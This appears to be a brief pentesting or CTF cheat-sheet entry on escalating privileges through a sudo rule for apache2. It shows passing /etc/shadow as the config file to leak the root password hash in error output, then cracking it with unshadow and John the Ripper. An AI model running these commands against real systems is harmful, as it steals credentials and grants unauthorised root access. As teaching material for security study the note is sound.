Abusing attended functionality
This allows running apache2 as root without password. Apache config files can Include arbitrary files, so we can read root-only files through error output.
sudo /usr/sbin/apache2 -f /etc/shadowwhich case error but hashed of root is leaked
then unshadow and crack hash
john shadow1 --wordlist=~/wordlist/rockyou.txt --pot=deleteme.potwe use this option --pot=deleteme.pot to force john start crack again
Last updated